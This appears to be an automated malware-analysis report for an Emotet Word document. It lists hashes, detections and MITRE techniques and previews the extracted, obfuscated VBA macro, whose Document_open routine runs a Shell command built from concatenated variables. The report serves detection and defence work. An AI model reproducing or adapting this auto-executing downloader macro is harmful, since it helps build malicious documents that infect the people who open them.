Emotet Office (OLE) malware analysis — malicious · d486c842b7bc3178

MALICIOUS

Office (OLE)

207.2 KB Created: 2018-07-19 11:09:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 41d017b2c6854d3aaaf09555107332f2 SHA-1: d5c019cc323e354cef164093f39aa4dc9cbd1bee SHA-256: d486c842b7bc3178a4ef69eb778084d523036f7e48b6aa1f24efe10ed02e5ec9

182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro and a critical Shell() call, strongly indicating malicious intent. The ClamAV detection name 'Doc.Downloader.Emotet-7349884-0' directly points to the Emotet family and its downloader functionality. The VBA script is designed to execute arbitrary commands, likely to download and run a second-stage payload.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-7349884-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7349884-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37969 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	37969 bytes
SHA-256: `2c574a4083e702055d37f0d958c71acede502d18bdc75d620d7df74451590943`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ZazdUOLZc" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function lJPatFVzOfCI() On Error Resume Next ZQYDQ = (MczQt * ZRmwdi - AkYGo * tmwSHz) EdNtGL = (zQJCnL * SpAtj - JwoUz * NJpQT) rTMzRb = (wicNH * BQJbY - uhDwM * DRSfKh) VmBul = (YTjLhu * ZDbKM - DviAKj * WiOJq) qdOvql = (pfmMl * UjFEdD - MnfBT * TGKVFQ) End Function Private Function NYoKrUl() On Error Resume Next spNfBR = 51882 - zFmKL / NoJvdR - VWIvAP + (oLjFs - 44633 - mKiUR / tBHjYi) uGvXi = 79326 - XRMdO / ibiqC - OFpTk + (vbXOW - 66594 - RzMTi / nnatFO) YZucn = 47326 - soYpIh / cOjulp - Ccfzl + (nwzub - 23378 - pDYAHZ / Ziwat) mkKka = 85071 - TEkAC / jmWjR - kbiabM + (DTObWW - 29245 - CaZVRi / SFwTOi) Nbkpbd = 55514 - ooGhJ / ihbZzv - aCzznF + (vGNdSd - 90199 - rRWUQB / mKzpKL) lAGqP = 96785 - KiXuo / EdNin - hLwLA + (FIZcH - 96490 - tEdbQj / zuQqzW) End Function Private Function IihZwlJdqAu() On Error Resume Next IwIHww = 58759 - LsbsFk / rjNBWi - fvHjq + (tHvqcv - 14470 - nXsjM / ZILsI) DoTKEp = 1105 - nNCjNz / fhtwD - OcbjM + (PAwiof - 82407 - kAmlO / jUUfs) HalEan = 78413 - zJzFc / DmFKkQ - FmtPCr + (vXrcO - 51942 - ANRJND / wWkOqS) dlSrNF = 84354 - NzMFC / EwkPJd - ELURJI + (XjObOt - 30653 - dwPqP / ZXjdKi) wmBwmr = 80035 - ikctlI / DSdjVz - bBomm + (oawWj - 2511 - BwjkUS / wfizK) ZnZHBC = 76513 - pXwfPc / XqBID - nAWMu + (QIAMY - 26991 - wECHZ / MWclRX) bdwwn = 47715 - zaDzA / ikkrIf - TlATNL + (oonziW - 23260 - ldQGr / jYLsPo) End Function Private Sub Document_open() On Error Resume Next pYkWKO = 5222 - udati / 69356 + UMRKwE * (51940 / 68094 + 43991 - CBXAj) slGnUn = 162 - EajJj / 22109 + bKDUY * (41767 / 25498 + 80708 - pNRIN) VBjtV = 96344 - EsCYZV / 42564 + KDjbb * (11511 / 88651 + 31589 - VMjVj) bYImVj = 82468 - SODKti / 19717 + qBEWop * (23518 / 21267 + 52590 - dXIOOV) Shell "" + szAtdCAYQ + dranurZNzMLFfv + CVar("c") + HWrLZHWQkKQwHD + kSMWOZXQ + cZPOLzYCME + SdJITQX + jjzRjMiQRN + XvGMAqGhFS + HfqoUjkilUa + EEizvCOG + nYXMhP + jBtDNBlDw + vBVQVDjowWN + DAJWqVuIcT + ZKnzPDzdLp + vZvpKfNSSWu + jXhCSk + BMjzaMtIMCjXVL + TiKKmLzKkGThD, 0 wplIlG = 3771 - KujzIr / 26164 + MtVur * (2117 / 85675 + 20924 - PZPUtL) End Sub Private Function arGczpVEpTJPid() On Error Resume Next cKYqYW = (TcvSGf - UPdaU / (95888 * YfYBwc / KwaYw * pkESn)) tcIFjX = (XWDJMG - GTOAdv / (13440 * jUXwzK / EJjDu * bHKjs)) QUznN = (htric - HQdcV / (44842 * urVMfb / pddbVM * DRLcXi)) JCjPJm = (qIBCI - IaShB / (43169 * ifaKsK / cVvWaT * izrLo)) jiNtU = (vBUVo - ufvISL / (47225 * DPPNQ / EwRAw * rjIqzl)) cOrmmw = (oczIMW - tohkZd / (1015 * ucJLb / MDTkKa * UdlJB)) End Function Private Function SoDTHIPnuBVKff() On Error Resume Next UiisGs = (ukWqEn - Baomk / (22670 * qraDC / RGGwYk * THrjnX)) UAjvH = (IkSrpI - rZAwtH / (57779 * lLMCU / UziFUj * bVRdJ)) qzbzTJ = 6298 - bRzSwV / 1365 + RYBLL * (60857 / 74002 + 47587 - qpFGVz) atnwQj = (PEJbpo - jpWsmC / (77707 * olVbuP / jTjOk * rXQmod)) jMYfFn = (pwBts - imDoD / (769 * ndYRU / kujEwM * jGiCYw)) End Function Private Function khjCdmSAAQ() On Error Resume Next wUVpva = 88410 - fLEiIU / 92960 + YHdzA * (35456 / 91356 + 51595 - YuCvo) MHtzP = 27487 - juWXT / 128 + wtjsi * (69457 / 13591 + 52840 - cwzRri) ffqPn = 90000 - flCDU / 49503 + tsuKYR * (41327 / 60629 + 97320 - ZumXjr) Nfwddh = 52995 - uzLwPa / 2099 + fCHkP * (63997 / 6063 + 99898 - LpsHpw) pTWwG = 77498 - FqzzaS / 41795 + mJRjbm * (75227 / 13476 + 62188 - JPjcr) FdaGsV = 73161 - XIimj / 17558 + IFfqij * (58045 / 51076 + 3748 - qazYw) End Function Private Function IwirWpVnv() On Error Resume Next BoRbjd = (UQVUB - KNvar / (16999 * zSpIZA / OhwfL * DCLnA)) nMGodX = (zfGcci - bjPfBi / (62523 * fmzznw / cGXAd * EoHCE)) NkCUMO = (zniRNl - dbrikN / (37977 * pGCIko ... (truncated)

SHA-256: 2c574a4083e702055d37f0d958c71acede502d18bdc75d620d7df74451590943

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ZazdUOLZc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function lJPatFVzOfCI()
On Error Resume Next
   ZQYDQ = (MczQt * ZRmwdi - AkYGo * tmwSHz)
   EdNtGL = (zQJCnL * SpAtj - JwoUz * NJpQT)
   rTMzRb = (wicNH * BQJbY - uhDwM * DRSfKh)
   VmBul = (YTjLhu * ZDbKM - DviAKj * WiOJq)
   qdOvql = (pfmMl * UjFEdD - MnfBT * TGKVFQ)
End Function
Private Function NYoKrUl()
On Error Resume Next
   spNfBR = 51882 - zFmKL / NoJvdR - VWIvAP + (oLjFs - 44633 - mKiUR / tBHjYi)
   uGvXi = 79326 - XRMdO / ibiqC - OFpTk + (vbXOW - 66594 - RzMTi / nnatFO)
   YZucn = 47326 - soYpIh / cOjulp - Ccfzl + (nwzub - 23378 - pDYAHZ / Ziwat)
   mkKka = 85071 - TEkAC / jmWjR - kbiabM + (DTObWW - 29245 - CaZVRi / SFwTOi)
   Nbkpbd = 55514 - ooGhJ / ihbZzv - aCzznF + (vGNdSd - 90199 - rRWUQB / mKzpKL)
   lAGqP = 96785 - KiXuo / EdNin - hLwLA + (FIZcH - 96490 - tEdbQj / zuQqzW)
End Function
Private Function IihZwlJdqAu()
On Error Resume Next
   IwIHww = 58759 - LsbsFk / rjNBWi - fvHjq + (tHvqcv - 14470 - nXsjM / ZILsI)
   DoTKEp = 1105 - nNCjNz / fhtwD - OcbjM + (PAwiof - 82407 - kAmlO / jUUfs)
   HalEan = 78413 - zJzFc / DmFKkQ - FmtPCr + (vXrcO - 51942 - ANRJND / wWkOqS)
   dlSrNF = 84354 - NzMFC / EwkPJd - ELURJI + (XjObOt - 30653 - dwPqP / ZXjdKi)
   wmBwmr = 80035 - ikctlI / DSdjVz - bBomm + (oawWj - 2511 - BwjkUS / wfizK)
   ZnZHBC = 76513 - pXwfPc / XqBID - nAWMu + (QIAMY - 26991 - wECHZ / MWclRX)
   bdwwn = 47715 - zaDzA / ikkrIf - TlATNL + (oonziW - 23260 - ldQGr / jYLsPo)
End Function
Private Sub Document_open()
On Error Resume Next
   pYkWKO = 5222 - udati / 69356 + UMRKwE * (51940 / 68094 + 43991 - CBXAj)
   slGnUn = 162 - EajJj / 22109 + bKDUY * (41767 / 25498 + 80708 - pNRIN)
   VBjtV = 96344 - EsCYZV / 42564 + KDjbb * (11511 / 88651 + 31589 - VMjVj)
   bYImVj = 82468 - SODKti / 19717 + qBEWop * (23518 / 21267 + 52590 - dXIOOV)
Shell "" + szAtdCAYQ + dranurZNzMLFfv + CVar("c") + HWrLZHWQkKQwHD + kSMWOZXQ + cZPOLzYCME + SdJITQX + jjzRjMiQRN + XvGMAqGhFS + HfqoUjkilUa + EEizvCOG + nYXMhP + jBtDNBlDw + vBVQVDjowWN + DAJWqVuIcT + ZKnzPDzdLp + vZvpKfNSSWu + jXhCSk + BMjzaMtIMCjXVL + TiKKmLzKkGThD, 0
   wplIlG = 3771 - KujzIr / 26164 + MtVur * (2117 / 85675 + 20924 - PZPUtL)
End Sub
Private Function arGczpVEpTJPid()
On Error Resume Next
   cKYqYW = (TcvSGf - UPdaU / (95888 * YfYBwc / KwaYw * pkESn))
   tcIFjX = (XWDJMG - GTOAdv / (13440 * jUXwzK / EJjDu * bHKjs))
   QUznN = (htric - HQdcV / (44842 * urVMfb / pddbVM * DRLcXi))
   JCjPJm = (qIBCI - IaShB / (43169 * ifaKsK / cVvWaT * izrLo))
   jiNtU = (vBUVo - ufvISL / (47225 * DPPNQ / EwRAw * rjIqzl))
   cOrmmw = (oczIMW - tohkZd / (1015 * ucJLb / MDTkKa * UdlJB))
End Function
Private Function SoDTHIPnuBVKff()
On Error Resume Next
   UiisGs = (ukWqEn - Baomk / (22670 * qraDC / RGGwYk * THrjnX))
   UAjvH = (IkSrpI - rZAwtH / (57779 * lLMCU / UziFUj * bVRdJ))
   qzbzTJ = 6298 - bRzSwV / 1365 + RYBLL * (60857 / 74002 + 47587 - qpFGVz)
   atnwQj = (PEJbpo - jpWsmC / (77707 * olVbuP / jTjOk * rXQmod))
   jMYfFn = (pwBts - imDoD / (769 * ndYRU / kujEwM * jGiCYw))
End Function
Private Function khjCdmSAAQ()
On Error Resume Next
   wUVpva = 88410 - fLEiIU / 92960 + YHdzA * (35456 / 91356 + 51595 - YuCvo)
   MHtzP = 27487 - juWXT / 128 + wtjsi * (69457 / 13591 + 52840 - cwzRri)
   ffqPn = 90000 - flCDU / 49503 + tsuKYR * (41327 / 60629 + 97320 - ZumXjr)
   Nfwddh = 52995 - uzLwPa / 2099 + fCHkP * (63997 / 6063 + 99898 - LpsHpw)
   pTWwG = 77498 - FqzzaS / 41795 + mJRjbm * (75227 / 13476 + 62188 - JPjcr)
   FdaGsV = 73161 - XIimj / 17558 + IFfqij * (58045 / 51076 + 3748 - qazYw)
End Function
Private Function IwirWpVnv()
On Error Resume Next
   BoRbjd = (UQVUB - KNvar / (16999 * zSpIZA / OhwfL * DCLnA))
   nMGodX = (zfGcci - bjPfBi / (62523 * fmzznw / cGXAd * EoHCE))
   NkCUMO = (zniRNl - dbrikN / (37977 * pGCIko 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.